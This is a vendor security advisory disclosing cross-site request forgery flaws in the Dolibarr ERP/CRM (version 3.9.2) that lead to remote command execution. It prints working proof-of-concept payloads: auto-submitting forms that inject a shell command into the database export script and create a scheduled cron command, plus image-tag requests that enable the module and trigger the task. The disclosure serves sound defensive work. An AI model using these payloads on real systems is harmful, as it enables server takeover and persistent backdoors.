Total Tests:

Multiple RCEs via CSRF in Dolibarr

Advisory ID:HTB23302
Vulnerable Versions:3.9.2 and probably prior
Tested Version:3.9.2
Advisory Publication:June 10, 2016 [without technical details]
Vendor Notification:June 10, 2016
Public Disclosure:September 26, 2018
Latest Update:October 2, 2016
Vulnerability Type:Cross-Site Request Forgery [CWE-352]
CVE Reference:Pending
Risk Level:High
CVSSv2 Base Score:8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H]
Discovered and Provided:High-Tech Bridge Security Research Lab

Advisory Details:

High-Tech Bridge Security Research Lab discovered multiple CSRF vulnerabilities in a popular ERP and CRM software Dolibarr. Discovered vulnerabilities may allow remote attacker to run arbitrary commands on vulnerable system via CSRF vector. Successful exploitation of the vulnerabilities can lead to full website and server compromise.

Cross-Site Request Forgery vulnerabilities exist in multiple scripts due to insufficient implementation of anti-CSRF mechanisms. The web application relies only on the HTTP Referer header to determine origin of HTTP requests, however it accepts requests with empty or absent HTTP Referer header. A remote unauthenticated attacker can create a specially crafted malicious web page with CSRF exploit, trick a logged-in administrator to visit the page, spoof the HTTP request as if it was coming from the legitimate admin and execute arbitrary OS commands on vulnerable system.

The PoC code below exploits vulnerability in "/admin/tools/export.php" database backup script and creates "/ls.txt" file in webroot directory with execution result of "/bin/ls" command (directory listing of current directory):

url = 'http://dolibarr/admin/tools/export.php';
location = 'data:text/html,<html><meta http-equiv="refresh" content="0; url=data:text/html,<form id=f method=post action=\''+url+'\'><input type=\'hidden\' name=\'export_type\' value=\'server\'><input type=\'hidden\' name=\'what\' value=\'mysql\'><input type=\'hidden\' name=\'mysqldump\' value=\'ls>../../../../../../../../../../ls.txt||\'><input type=\'hidden\' name=\'disable_fk\' value=\'yes\'><input type=\'hidden\' name=\'sql_compat\' value=\'NONE\'><input type=\'hidden\' name=\'sql_structure\' value=\'structure\'><input type=\'hidden\' name=\'drop\' value=\'on\'><input type=\'hidden\' name=\'sql_data\' value=\'data\'><input type=\'hidden\' name=\'showcolumns\' value=\'yes\'><input type=\'hidden\' name=\'extended_ins\' value=\'yes\'><input type=\'hidden\' name=\'hexforbinary\' value=\'yes\'><input type=\'hidden\' name=\'nobin_disable_fk\' value=\'yes\'><input type=\'hidden\' name=\'nobin_drop\' value=\'on\'><input type=\'hidden\' name=\'filename_template\' value=\'12345.sql\'><input type=\'hidden\' name=\'compression\' value=\'bz\'><input type=\'submit\' value=\'Submit request\'></form><script>document.getElementById(\'f\').submit()</scri'+'pt> "></html>';

Another exploitation technique of the vulnerabilities allows backdoor injection using "cron" module. It is possible to use CSRF vulnerability in "/admin/modules.php" script to activate "cron" module and CSRF in "/cron/card.php" script to run scheduled malicious task on the system. The attackers can use this technique to secure their presence on the compromised system.

The following CSRF exploit below will activate "cron" module:

<img src="http://dolibarr/admin/modules.php?id=2300&module_position=500&action=se t&value=modCron&mode=common">

The next step would be to create a "cron" task using the following code:

url = 'http://dolibarr/cron/card.php';
location = 'data:text/html,<html><meta http-equiv="refresh" content="0; url=data:text/html,<form id=f method=post action=\''+url+'\'><input type=\'hidden\' name=\'action\' value=\'add\' /><input type=\'hidden\' name=\'label\' value=\'1\' /><input type=\'hidden\' name=\'jobtype\' value=\'command\' /><input type=\'hidden\' name=\'datestart\' value=\'06/08/2016\' /><input type=\'hidden\' name=\'datestartday\' value=\'08\' /><input type=\'hidden\' name=\'datestartmonth\' value=\'06\' /><input type=\'hidden\' name=\'datestartyear\' value=\'2016\' /><input type=\'hidden\' name=\'datestarthour\' value=\'00\' /><input type=\'hidden\' name=\'datestartmin\' value=\'00\' /><input type=\'hidden\' name=\'dateend\' value=\'\' /><input type=\'hidden\' name=\'dateendday\' value=\'\' /><input type=\'hidden\' name=\'dateendmonth\' value=\'\' /><input type=\'hidden\' name=\'dateendyear\' value=\'\' /><input type=\'hidden\' name=\'dateendhour\' value=\'-1\' /><input type=\'hidden\' name=\'dateendmin\' value=\'-1\' /><input type=\'hidden\' name=\'priority\' value=\'0\' /><input type=\'hidden\' name=\'nbfrequency\' value=\'1\' /><input type=\'hidden\' name=\'unitfrequency\' value=\'60\' /><input type=\'hidden\' name=\'module_name\' value=\'\' /><input type=\'hidden\' name=\'classesname\' value=\'\' /><input type=\'hidden\' name=\'objectname\' value=\'\' /><input type=\'hidden\' name=\'methodename\' value=\'\' /><input type=\'hidden\' name=\'params\' value=\'\' /><input type=\'hidden\' name=\'command\' value=\'ls > ../../../../../ls.txt\' /><input type=\'hidden\' name=\'note\' value=\'\' /><input type=\'hidden\' name=\'save\' value=\'Save\' /><input type=\'submit\' value=\'Submit request\' /></form><script>document.getElementById(\'f\').submit()</scri'+'pt>"></html >';

Our task will execute "/bin/ls" command and write its output onto "/ls.txt" file. We can use the following CSRF exploit to trigger execution of our "cron" task:

<img src="http://dolibarr/cron/card.php?action=activate&id=1">

Vendor notified, awaiting vendor solution.

[1] High-Tech Bridge Advisory HTB23302 - - Multiple RCE via CSRF in Dolibarr
[2] Dolibarr - - Dolibarr ERP & CRM is a modern and easy to use open-source web software package to manage your business (customers, invoices, orders, products, stocks, agenda, emailings, shipments...).
[3] Common Weakness Enumeration (CWE) - - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® - Leveraging the power of machine-learning and genius of human brain to deliver the most advanced web application security and penetration testing.
[5] ImmuniWeb® SSLScan - Test your servers for security and compliance with PCI DSS, HIPAA and NIST.

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Book a Call Ask a Question
Talk to ImmuniWeb Experts
ImmuniWeb AI Platform
Have a technical question?

Our security experts will answer within
one business day. No obligations.

Have a sales question?
Tel: +41 22 560 6800 (Switzerland)
Tel: +1 720 605 9147 (USA)
Your data will stay private and confidential